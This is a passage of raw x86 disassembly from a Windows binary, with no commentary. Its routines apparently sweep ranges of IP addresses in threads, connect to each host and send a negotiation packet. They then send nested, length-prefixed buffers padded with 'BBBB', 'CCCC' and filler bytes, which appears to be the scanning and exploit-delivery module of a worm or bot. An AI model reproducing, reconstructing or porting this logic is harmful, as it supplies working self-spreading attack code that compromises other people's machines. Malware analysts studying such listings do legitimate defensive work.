cmp dword_4CBB24[eax*8], 1
jnz loc_40C7B0
push 7D0h
call esi ; Sleep
jmp short loc_40C845
sub_40C600 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C85F proc near ; DATA XREF: sub_40C92C+7B�o
; sub_40CA1D+7B�o
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0BCh
mov eax, [ebp+arg_0]
push esi
push edi
push 2Bh
pop ecx
mov esi, eax
lea edi, [ebp+var_BC]
push 1
rep movsd
pop esi
mov [eax+0A8h], esi
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_41BF70
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+var_38]
call dword_4CB9D4 ; htons
mov [ebp+var_E], ax
mov eax, [ebp+var_28]
push 6
push esi
push 2
mov [ebp+var_C], eax
call dword_4CBA54 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40C91D
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call dword_4CB97C ; connect
mov ecx, [ebp+var_2C]
imul ecx, 234h
cmp eax, 0FFFFFFFFh
mov dword_43E91C[ecx], esi
jz short loc_40C91D
push [ebp+var_38]
push [ebp+var_28]
call dword_4CBA60 ; inet_ntoa
push eax
mov edi, offset dword_4CE4E4
push offset unk_431F7C
push edi
call sub_41C266
push 0
lea eax, [ebp+var_B8]
push [ebp+var_20]
push edi
push eax
push [ebp+var_BC]
call sub_409869
push edi
call sub_415D38
add esp, 28h
loc_40C91D: ; CODE XREF: sub_40C85F+5D�j
; sub_40C85F+7E�j
push esi
call dword_4CBA6C ; closesocket
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_40C85F endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40C92C proc near ; DATA XREF: sub_401ACD+5F60�o
var_134 = byte ptr -134h
var_B4 = byte ptr -0B4h
var_30 = dword ptr -30h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 134h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push 2Bh
mov esi, ebx
pop ecx
lea edi, [ebp+var_B4]
rep movsd
mov esi, ds:dword_427080
mov dword ptr [ebx+0A4h], 1
xor edi, edi
loc_40C95A: ; CODE XREF: sub_40C92C+EC�j
push [ebp+var_30]
push [ebp+var_20]
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+var_134]
push offset unk_431FA4
push eax
call sub_41C266
lea eax, [ebp+var_134]
push 1FFh
push eax
mov eax, [ebp+var_24]
imul eax, 234h
add eax, offset dword_43E710
push eax
call sub_41BFD0
add esp, 1Ch
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_B4]
push edi
push eax
push offset sub_40C85F
push edi
push edi
call ds:dword_427084 ; CreateThread
cmp eax, edi
mov [ebp+var_4], eax
jz short loc_40C9C6
loc_40C9BB: ; CODE XREF: sub_40C92C+98�j
cmp [ebp+var_C], edi
jnz short loc_40C9C6
push 32h
call esi ; Sleep
jmp short loc_40C9BB
; ---------------------------------------------------------------------------
loc_40C9C6: ; CODE XREF: sub_40C92C+8D�j
; sub_40C92C+92�j
push [ebp+var_4]
call ds:dword_427070 ; CloseHandle
push dword ptr [ebx+8Ch]
mov [ebx+0A8h], edi
call esi ; Sleep
lea eax, [ebp+var_20]
push 4
push eax
lea eax, [ebp+arg_0]
push eax
call sub_41CD20
add esp, 0Ch
push [ebp+arg_0]
call dword_4CB8FC ; htonl
inc eax
push eax
mov [ebp+arg_0], eax
call dword_4CB9D0 ; htonl
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push 4
push eax
lea eax, [ebp+var_20]
push eax
call sub_41CD20
add esp, 0Ch
jmp loc_40C95A
sub_40C92C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CA1D proc near ; DATA XREF: sub_401ACD+5C80�o
var_130 = byte ptr -130h
var_B0 = dword ptr -0B0h
var_AC = byte ptr -0ACh
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 130h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push 2Bh
mov esi, ebx
pop ecx
lea edi, [ebp+var_B0]
rep movsd
mov esi, ds:dword_427080
mov dword ptr [ebx+0A4h], 1
xor edi, edi
loc_40CA4B: ; CODE XREF: sub_40CA1D+BC�j
push [ebp+var_2C]
push [ebp+var_1C]
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+var_130]
push offset unk_431FF8
push eax
call sub_41C266
lea eax, [ebp+var_130]
push 1FFh
push eax
mov eax, [ebp+var_20]
imul eax, 234h
add eax, offset dword_43E710
push eax
call sub_41BFD0
add esp, 1Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_B0]
push edi
push eax
push offset sub_40C85F
push edi
push edi
call ds:dword_427084 ; CreateThread
cmp eax, edi
mov [ebp+arg_0], eax
jz short loc_40CAB7
loc_40CAAC: ; CODE XREF: sub_40CA1D+98�j
cmp [ebp+var_8], edi
jnz short loc_40CAB7
push 32h
call esi ; Sleep
jmp short loc_40CAAC
; ---------------------------------------------------------------------------
loc_40CAB7: ; CODE XREF: sub_40CA1D+8D�j
; sub_40CA1D+92�j
push [ebp+arg_0]
call ds:dword_427070 ; CloseHandle
push dword ptr [ebx+8Ch]
mov [ebx+0A8h], edi
call esi ; Sleep
mov eax, [ebp+var_2C]
cmp eax, [ebp+var_28]
jz short loc_40CADE
inc [ebp+var_2C]
jmp loc_40CA4B
; ---------------------------------------------------------------------------
loc_40CADE: ; CODE XREF: sub_40CA1D+B7�j
push [ebp+var_1C]
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+var_130]
push offset unk_431FCC
push eax
call sub_41C266
push edi
lea eax, [ebp+var_130]
push [ebp+var_14]
push eax
lea eax, [ebp+var_AC]
push eax
push [ebp+var_B0]
call sub_409869
push [ebp+var_20]
call sub_40B6D6
add esp, 24h
xor eax, eax
pop edi
pop esi
pop ebx
leave
retn 4
sub_40CA1D endp
; =============== S U B R O U T I N E =======================================
sub_40CB2A proc near ; CODE XREF: sub_40CD9E+E�p
; sub_40CD9E+33�p ...
mov eax, ecx
and dword ptr [eax+4], 0
and dword ptr [eax], 0
retn
sub_40CB2A endp
; =============== S U B R O U T I N E =======================================
sub_40CB34 proc near ; CODE XREF: sub_40CD9E+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_4]
push esi
push edi
mov esi, ecx
push ebx
call sub_41BEB5
mov edi, eax
pop ecx
test edi, edi
jz short loc_40CB66
push ebx
push 0
push edi
call sub_41BF70
push ebx
push [esp+1Ch+arg_0]
push edi
call sub_41CD20
add esp, 18h
mov [esi+4], ebx
mov [esi], edi
loc_40CB66: ; CODE XREF: sub_40CB34+14�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_40CB34 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CB6E proc near ; CODE XREF: sub_40CC68+18�p
; sub_40CCE2+16�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
mov ebx, ecx
push esi
mov ecx, [ebp+arg_C]
push edi
lea edi, [eax+ecx]
push edi
call sub_41BEB5
mov esi, eax
pop ecx
test esi, esi
jz short loc_40CBBA
push edi
push 0
push esi
call sub_41BF70
push [ebp+arg_4]
push [ebp+arg_0]
push esi
call sub_41CD20
push [ebp+arg_C]
mov eax, [ebp+arg_4]
add eax, esi
push [ebp+arg_8]
push eax
call sub_41CD20
add esp, 24h
mov [ebx+4], edi
mov [ebx], esi
loc_40CBBA: ; CODE XREF: sub_40CB6E+1C�j
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn 10h
sub_40CB6E endp
; =============== S U B R O U T I N E =======================================
sub_40CBC3 proc near ; CODE XREF: sub_40CC68+5E�p
; sub_40CC68+6F�p ...
push esi
mov esi, ecx
mov eax, [esi]
test eax, eax
jz short loc_40CBD3
push eax
call sub_41BA91
pop ecx
loc_40CBD3: ; CODE XREF: sub_40CBC3+7�j
and dword ptr [esi+4], 0
and dword ptr [esi], 0
pop esi
retn
sub_40CBC3 endp
; =============== S U B R O U T I N E =======================================
sub_40CBDC proc near ; CODE XREF: sub_40CC68+20�p
; sub_40CD43+8�p ...
push ebx
push esi
mov esi, ecx
push edi
mov eax, [esi+4]
cmp eax, 0FFFFh
jge short loc_40CC09
xor ebx, ebx
cmp eax, 7Fh
setnl bl
dec ebx
and ebx, 0FFFFFFFEh
add ebx, 3
add eax, ebx
push eax
call sub_41BEB5
mov edi, eax
pop ecx
test edi, edi
jnz short loc_40CC0D
loc_40CC09: ; CODE XREF: sub_40CBDC+D�j
xor al, al
jmp short loc_40CC64
; ---------------------------------------------------------------------------
loc_40CC0D: ; CODE XREF: sub_40CBDC+2B�j
mov eax, ebx
add eax, [esi+4]
push eax
push 0
push edi
call sub_41BF70
add esp, 0Ch
cmp ebx, 1
jnz short loc_40CC32
mov al, [esi+4]
mov [edi], al
push dword ptr [esi+4]
lea eax, [edi+1]
push dword ptr [esi]
jmp short loc_40CC4C
; ---------------------------------------------------------------------------
loc_40CC32: ; CODE XREF: sub_40CBDC+45�j
mov byte ptr [edi], 82h
mov eax, [esi+4]
sar eax, 8
mov [edi+1], al
mov al, [esi+4]
mov [edi+2], al
push dword ptr [esi+4]
lea eax, [edi+3]
push dword ptr [esi]
loc_40CC4C: ; CODE XREF: sub_40CBDC+54�j
push eax
call sub_41CD20
add esp, 0Ch
push dword ptr [esi]
call sub_41BA91
add [esi+4], ebx
pop ecx
mov [esi], edi
mov al, 1
loc_40CC64: ; CODE XREF: sub_40CBDC+2F�j
pop edi
pop esi
pop ebx
retn
sub_40CBDC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CC68 proc near ; CODE XREF: sub_40CD9E+89�p
; sub_40CD9E+E3�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push edi
lea ecx, [ebp+var_8]
push dword ptr [esi+4]
push dword ptr [esi]
push 1
push offset word_4CB88C
call sub_40CB6E
lea ecx, [ebp+var_8]
call sub_40CBDC
mov eax, [ebp+var_4]
inc eax
push eax
call sub_41BEB5
mov edi, eax
pop ecx
test edi, edi
jnz short loc_40CCA2
xor al, al
jmp short loc_40CCDE
; ---------------------------------------------------------------------------
loc_40CCA2: ; CODE XREF: sub_40CC68+34�j
mov eax, [ebp+var_4]
inc eax
push eax
push 0
push edi
call sub_41BF70
mov byte ptr [edi], 3
push [ebp+var_4]
lea eax, [edi+1]
push [ebp+var_8]
push eax
call sub_41CD20
add esp, 18h
mov ecx, esi
call sub_40CBC3
mov eax, [ebp+var_4]
lea ecx, [ebp+var_8]
inc eax
mov [esi], edi
mov [esi+4], eax
call sub_40CBC3
mov al, 1
loc_40CCDE: ; CODE XREF: sub_40CC68+38�j
pop edi
pop esi
leave
retn
sub_40CC68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CCE2 proc near ; CODE XREF: sub_40CD16+14�p
; sub_40CD33+8�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push [ebp+arg_4]
lea ecx, [ebp+var_8]
push [ebp+arg_0]
push dword ptr [esi+4]
push dword ptr [esi]
call sub_40CB6E
mov ecx, esi
call sub_40CBC3
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
pop esi
leave
retn 8
sub_40CCE2 endp
; =============== S U B R O U T I N E =======================================
sub_40CD16 proc near ; CODE XREF: sub_40CD9E+F0�p
; sub_40CD9E+15B�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
call sub_41B9C0
pop ecx
push eax
mov ecx, esi
push [esp+8+arg_0]
call sub_40CCE2
pop esi
retn 4
sub_40CD16 endp
; =============== S U B R O U T I N E =======================================
sub_40CD33 proc near ; CODE XREF: sub_40CD7F+B�p
; sub_40CD9E+1A1�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_40CCE2
retn 8
sub_40CD33 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CD43 proc near ; CODE XREF: sub_40CD7F+16�p
; sub_40CD9E+91�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
call sub_40CBDC
test al, al
jz short loc_40CD7C
push dword ptr [esi+4]
lea ecx, [ebp+var_8]
push dword ptr [esi]
push 1
push offset dword_42CC80
call sub_40CB6E
mov ecx, esi
call sub_40CBC3
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
loc_40CD7C: ; CODE XREF: sub_40CD43+F�j
pop esi
leave
retn
sub_40CD43 endp
; =============== S U B R O U T I N E =======================================
sub_40CD7F proc near ; CODE XREF: sub_40CD9E+134�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_40CD33
test al, al
jz short loc_40CD9A
mov ecx, esi
call sub_40CD43
loc_40CD9A: ; CODE XREF: sub_40CD7F+12�j
pop esi
retn 8
sub_40CD7F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CD9E proc near ; CODE XREF: .text:0040D625�p
var_858 = byte ptr -858h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 858h
push ebx
push edi
lea ecx, [ebp+var_48]
call sub_40CB2A
mov edi, 408h
cmp [ebp+arg_8], edi
jg loc_40D0F2
mov ebx, [ebp+arg_10]
lea eax, [ebx+8]
cmp eax, edi
ja loc_40D0F2
push esi
lea ecx, [ebp+var_30]
call sub_40CB2A
lea ecx, [ebp+var_20]
call sub_40CB2A
lea ecx, [ebp+var_50]
call sub_40CB2A
lea ecx, [ebp+var_18]
call sub_40CB2A
lea ecx, [ebp+var_40]
call sub_40CB2A
lea ecx, [ebp+var_38]
call sub_40CB2A
lea ecx, [ebp+var_28]
call sub_40CB2A
push 4
push offset dword_432030
lea ecx, [ebp+var_30]
call sub_40CCE2
push 3
push offset dword_432038
lea ecx, [ebp+var_30]
call sub_40CCE2
lea ecx, [ebp+var_30]
call sub_40CC68
lea ecx, [ebp+var_30]
call sub_40CD43
mov esi, 800h
lea eax, [ebp+var_858]
push esi
push 42h
push eax
call sub_41BF70
add esp, 0Ch
lea ecx, [ebp+var_20]
push 8
push offset aRbrbrbrb ; "BBBB"
call sub_40CCE2
push ebx
lea ecx, [ebp+var_20]
push [ebp+arg_C]
call sub_40CCE2
mov eax, 409h
lea ecx, [ebp+var_20]
sub eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_858]
push eax
call sub_40CCE2
lea ecx, [ebp+var_20]
call sub_40CC68
push offset dword_4323B4
lea ecx, [ebp+var_50]
call sub_40CD16
lea ecx, [ebp+var_50]
call sub_40CC68
push esi
lea eax, [ebp+var_858]
push 44h
push eax
call sub_41BF70
add esp, 0Ch
lea eax, [ebp+var_858]
lea ecx, [ebp+var_58]
push 410h
push eax
call sub_40CB34
lea ecx, [ebp+var_58]
call sub_40CC68
push [ebp+var_54]
lea ecx, [ebp+var_50]
push [ebp+var_58]
call sub_40CD7F
lea ecx, [ebp+var_58]
call sub_40CBC3
push esi
lea eax, [ebp+var_858]
push 43h
push eax
call sub_41BF70
add esp, 0Ch
push offset aCccc ; "CCCC"
lea ecx, [ebp+var_18]
call sub_40CD16
push 4
push offset dword_43203C
lea ecx, [ebp+var_18]
call sub_40CCE2
push [ebp+arg_8]
lea ecx, [ebp+var_18]
push [ebp+arg_4]
call sub_40CCE2
sub edi, [ebp+arg_8]
lea eax, [ebp+var_858]
lea ecx, [ebp+var_18]
push edi
push eax
call sub_40CCE2
lea ecx, [ebp+var_18]
call sub_40CC68
push [ebp+var_14]
lea ecx, [ebp+var_40]
push [ebp+var_18]
call sub_40CD33
push [ebp+var_4C]
lea ecx, [ebp+var_40]
push [ebp+var_50]
call sub_40CD33
lea ecx, [ebp+var_40]
call sub_40CD43
lea ecx, [ebp+var_18]
call sub_40CBC3
lea ecx, [ebp+var_50]
call sub_40CBC3
push [ebp+var_1C]
lea ecx, [ebp+var_38]
push [ebp+var_20]
call sub_40CD33
push [ebp+var_2C]
lea ecx, [ebp+var_38]
push [ebp+var_30]
call sub_40CD33
push [ebp+var_3C]
lea ecx, [ebp+var_38]
push [ebp+var_40]
call sub_40CD33
lea ecx, [ebp+var_38]
call sub_40CD43
lea ecx, [ebp+var_20]
call sub_40CBC3
lea ecx, [ebp+var_30]
call sub_40CBC3
lea ecx, [ebp+var_40]
call sub_40CBC3
push esi
lea eax, [ebp+var_858]
push 41h
push eax
call sub_41BF70
add esp, 0Ch
lea eax, [ebp+var_858]
lea ecx, [ebp+var_28]
push 400h
push eax
call sub_40CCE2
lea ecx, [ebp+var_28]
call sub_40CC68
push 2
push offset dword_4323A8
lea ecx, [ebp+var_28]
call sub_40CCE2
push [ebp+var_34]
lea ecx, [ebp+var_28]
push [ebp+var_38]
call sub_40CD33
lea ecx, [ebp+var_28]
call sub_40CD43
lea ecx, [ebp+var_38]
call sub_40CBC3
lea ecx, [ebp+var_10]
call sub_40CB2A
lea ecx, [ebp+var_8]
call sub_40CB2A
push [ebp+var_24]
lea ecx, [ebp+var_10]
push [ebp+var_28]
call sub_40CD33
lea ecx, [ebp+var_10]
call sub_40CBDC
lea ecx, [ebp+var_28]
call sub_40CBC3
push offset dword_4323A4
lea ecx, [ebp+var_8]
call sub_40CD16
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_40CD33
lea ecx, [ebp+var_8]
call sub_40CBDC
lea ecx, [ebp+var_10]
call sub_40CBC3
push offset dword_4323A0
lea ecx, [ebp+var_10]
call sub_40CD16
push [ebp+var_4]
lea ecx, [ebp+var_10]
push [ebp+var_8]
call sub_40CD33
lea ecx, [ebp+var_10]
call sub_40CBDC
lea ecx, [ebp+var_8]
call sub_40CBC3
push offset dword_432394
lea ecx, [ebp+var_8]
call sub_40CD16
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_40CD33
lea ecx, [ebp+var_8]
call sub_40CBDC
lea ecx, [ebp+var_10]
call sub_40CBC3
push offset dword_432390
lea ecx, [ebp+var_48]
call sub_40CD16
push [ebp+var_4]
lea ecx, [ebp+var_48]
push [ebp+var_8]
call sub_40CD33
lea ecx, [ebp+var_8]
call sub_40CBC3
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_48]
pop esi
mov [eax], ecx
mov ecx, [ebp+var_44]
mov [eax+4], ecx
jmp short loc_40D100
; ---------------------------------------------------------------------------
loc_40D0F2: ; CODE XREF: sub_40CD9E+1B�j
; sub_40CD9E+29�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_48]
mov [eax], ecx
mov ecx, [ebp+var_44]
mov [eax+4], ecx
loc_40D100: ; CODE XREF: sub_40CD9E+352�j
pop edi
pop ebx
leave
retn
sub_40CD9E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D104 proc near ; CODE XREF: sub_40D1C8+A1�p
; sub_40D1C8+C2�p ...
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push esi
push edi
mov esi, [ebp+arg_0]
push 1
pop edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_210]
and [ebp+var_4], 0
push eax
lea eax, [ebp+var_10C]
push 0
push eax
lea eax, [esi+1]
push eax
mov [ebp+var_108], esi
mov [ebp+var_10C], edi
mov [ebp+var_20C], esi
mov [ebp+var_210], edi
mov [ebp+var_8], 0Ah
call ds:dword_42720C ; select
cmp eax, edi
jnz short loc_40D16B
lea eax, [ebp+var_10C]
push eax
push esi
call sub_426350 ; __WSAFDIsSet
test eax, eax
jnz short loc_40D16F
loc_40D16B: ; CODE XREF: sub_40D104+54�j
xor eax, eax
jmp short loc_40D17F
; ---------------------------------------------------------------------------
loc_40D16F: ; CODE XREF: sub_40D104+65�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call dword_4CB9EC ; recv
loc_40D17F: ; CODE XREF: sub_40D104+69�j
pop edi
pop esi
leave
retn
sub_40D104 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D183 proc near ; CODE XREF: sub_40D1C8+81�p
; sub_40D1C8+AB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
call dword_4CB9D0 ; htonl
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_4]
push 4
push eax
push [ebp+arg_0]
call dword_4CBA24 ; send
cmp eax, 4
jz short loc_40D1AD
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_40D1AD: ; CODE XREF: sub_40D183+24�j
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4CBA24 ; send
sub eax, [ebp+arg_8]
neg eax
sbb eax, eax
inc eax
leave
retn
sub_40D183 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D1C8 proc near ; CODE XREF: sub_40D2A2+48�p
; .text:0040D716�p
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 104h
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
lea ebx, [edi+41h]
push ebx
mov [ebp+var_4], ebx
call sub_41BEB5
mov esi, eax
pop ecx
test esi, esi
jnz short loc_40D1F1
xor al, al
jmp loc_40D29D
; ---------------------------------------------------------------------------
loc_40D1F1: ; CODE XREF: sub_40D1C8+20�j
push ebx
push 0
push esi
call sub_41BF70
push 2Fh
push offset dword_4320CC
push esi
call sub_41CD20
push 8
lea eax, [esi+31h]
push offset dword_4320FC
push eax
mov [esi+2Fh], di
call sub_41CD20
push edi
lea ebx, [esi+3Bh]
push [ebp+arg_4]
mov [esi+39h], di
push ebx
call sub_41CD20
push 6
add ebx, edi
push offset dword_4CE6EC
push ebx
call sub_41CD20
mov ebx, [ebp+arg_0]
push 85h
push offset dword_432044
push ebx
call sub_40D183
add esp, 48h
test al, al
jnz short loc_40D259
loc_40D255: ; CODE XREF: sub_40D1C8+B5�j
xor bl, bl
jmp short loc_40D294
; ---------------------------------------------------------------------------
loc_40D259: ; CODE XREF: sub_40D1C8+8B�j
mov edi, 100h
push 0
lea eax, [ebp+var_104]
push edi
push eax
push ebx
call sub_40D104
push [ebp+var_4]
push esi
push ebx
call sub_40D183
add esp, 1Ch
test al, al
jz short loc_40D255
push 0
lea eax, [ebp+var_104]
push edi
push eax
push ebx
call sub_40D104
add esp, 10h
mov bl, 1
loc_40D294: ; CODE XREF: sub_40D1C8+8F�j
push esi
call sub_41BA91
pop ecx
mov al, bl
loc_40D29D: ; CODE XREF: sub_40D1C8+24�j
pop edi
pop esi
pop ebx
leave
retn
sub_40D1C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D2A2 proc near ; CODE XREF: .text:0040D6FC�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push 0
push 48h
push offset unk_432108
push [ebp+arg_0]
call ds:dword_427208 ; send
cmp eax, 48h
jnz short loc_40D2DD
push 0
lea eax, [ebp+var_20]
push 20h
push eax
push [ebp+arg_0]
call sub_40D104
add esp, 10h
cmp eax, 0FFFFFFFFh
jz short loc_40D2DD
cmp [ebp+var_20], 82h
jz short loc_40D2E1
loc_40D2DD: ; CODE XREF: sub_40D2A2+1B�j
; sub_40D2A2+33�j
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_40D2E1: ; CODE XREF: sub_40D2A2+39�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D1C8
add esp, 0Ch
leave
retn
sub_40D2A2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D2F4 proc near ; CODE XREF: sub_40D340+2D�p
var_10 = qword ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
and dword ptr [ebp+var_8+4], 0
shl eax, 3
mov dword ptr [ebp+var_8], eax
fild [ebp+var_8]
fmul ds:dbl_427670
call sub_41D174
and dword ptr [ebp+var_8+4], 0
mov dword ptr [ebp+var_8], eax
fild [ebp+var_8]
push ecx
push ecx ; double
fst [ebp+var_8]
fmul ds:dbl_427668
fstp [esp+10h+var_10]
call sub_41D055
fadd st, st
pop ecx
pop ecx
fadd [ebp+var_8]
call sub_41D174
inc eax
leave
retn
sub_40D2F4 endp
; =============== S U B R O U T I N E =======================================
sub_40D340 proc near ; CODE XREF: sub_40D4E2+24�p
var_40 = qword ptr -40h
mov eax, offset loc_426AA7
call sub_41D640
sub esp, 2Ch
mov al, [ebp+13h]
push ebx
push esi
push edi
xor edi, edi
lea ecx, [ebp-38h]
push edi
mov [ebp-20h], edi
mov [ebp-38h], al
call sub_40D977
push 1
pop ebx
push dword ptr [ebp+10h]
mov [ebp-4], ebx
call sub_40D2F4
cmp [ebp-2Ch], eax
pop ecx
jnb short loc_40D382
push edi
push eax
lea ecx, [ebp-38h]
call sub_40D8F2
loc_40D382: ; CODE XREF: sub_40D340+36�j
cmp [ebp+10h], edi
mov [ebp-18h], edi
jbe loc_40D49F
mov ebx, [ebp+10h]
loc_40D391: ; CODE XREF: sub_40D340+156�j
cmp dword ptr [ebp+10h], 3
jb short loc_40D39B
push 3
jmp short loc_40D3AD
; ---------------------------------------------------------------------------
loc_40D39B: ; CODE XREF: sub_40D340+55�j
cmp dword ptr [ebp+10h], 2
jnz short loc_40D3A5
push 2
jmp short loc_40D3AD
; ---------------------------------------------------------------------------
loc_40D3A5: ; CODE XREF: sub_40D340+5F�j
cmp dword ptr [ebp+10h], 1
jnz short loc_40D3AE
push 1
loc_40D3AD: ; CODE XREF: sub_40D340+59�j
; sub_40D340+63�j
pop ebx
loc_40D3AE: ; CODE XREF: sub_40D340+69�j
mov [ebp-28h], ebx
mov [ebp-24h], edi
fild qword ptr [ebp-28h]
push ecx
push ecx ; double
fmul ds:dbl_427680
fstp [esp+40h+var_40]
call sub_41D19B
pop ecx
pop ecx
call sub_41D174
cmp ebx, edi
mov [ebp-1Ch], eax
jbe short loc_40D3ED
mov esi, [ebp+0Ch]
mov ecx, ebx
mov edx, ecx
lea edi, [ebp-10h]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
xor edi, edi
loc_40D3ED: ; CODE XREF: sub_40D340+93�j
mov cl, [ebp-10h]
mov dl, [ebp-10h]
sar cl, 2
and cl, 3Fh
and dl, 3
mov [ebp-14h], cl
mov cl, [ebp-0Fh]
sar cl, 4
and cl, 0Fh
add [ebp+0Ch], ebx
shl dl, 4
add cl, dl
mov dl, [ebp-0Fh]
mov [ebp-13h], cl
mov cl, [ebp-0Eh]
sar cl, 6
and dl, 0Fh
sub [ebp+10h], ebx
and cl, 3
xor esi, esi
shl dl, 2
add cl, dl
mov [ebp-12h], cl
mov cl, [ebp-0Eh]
and cl, 3Fh
cmp eax, edi
mov [ebp-11h], cl
jbe short loc_40D45B
add [ebp-18h], eax
loc_40D43F: ; CODE XREF: sub_40D340+119�j
movsx eax, byte ptr [ebp+esi-14h]
lea ecx, [ebp-38h]
mov al, byte_432154[eax]
push eax
push 1
call sub_40D774
inc esi
cmp esi, [ebp-1Ch]
jb short loc_40D43F
